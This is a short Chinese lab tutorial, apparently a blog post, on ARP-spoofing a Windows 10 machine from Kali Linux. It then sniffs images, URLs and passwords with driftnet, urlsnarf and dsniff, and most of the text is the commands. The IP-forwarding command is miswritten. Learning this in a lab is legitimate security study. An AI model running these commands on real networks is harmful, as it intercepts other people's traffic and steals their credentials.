从arp欺骗到信息嗅探

实验环境准备
kali linux 192.168.124.222 win10 192.168.124.123
使用工具
arpspoof 进行arp欺骗 arpspoof是dsniff的插件
dsniff driftnet 嗅探工具

在kali执行

开启ip转发(若不开启则会令目标断网)

echo 1 /proc/sys/net/ipv4/ip_forward

进行欺骗

root@Box:~# arpspoof -i eth0 -t 192.168.124.123  192.168.124.254

192.168.124.254 是网关
arpapoof用法
arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host
-i 指定用攻击机的哪个网络接口
-t 欺骗目标
-r 希望拦截攻击机和哪个host之间的通信,一般都是网关

验证是否欺骗成功

在win10 cmd查看arp缓存表
arp -a

在这里插入图片描述
192.168.124.222 与 192.168.124.254 mac地址相同了说明 win10已经被欺骗

进行嗅探

# 实时显示图片
 root@kali:~# driftnet -i eth0 
 # -a 不要在屏幕上显示图像,而是将其保存到一个临时目录中,并在标准输出上公布它们的名称。
 # -d 指定目录
 # -s 抓取声音
 root@kali:~# driftnet -i eth0 -a -d testdir -s

 # 抓取 URL
 root@kali:~# webspy -i eth0 10.10.10.133
 root@kali:~# urlsnarf -i eth0

 # 嗅探密码
 # -m:自动协议检测
 root@kali:~# dsniff -i eth0 -m
 # 支持的协议类型
 root@kali:~# cat /usr/lib/x86_64-linux-gnu/dsniff.services
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值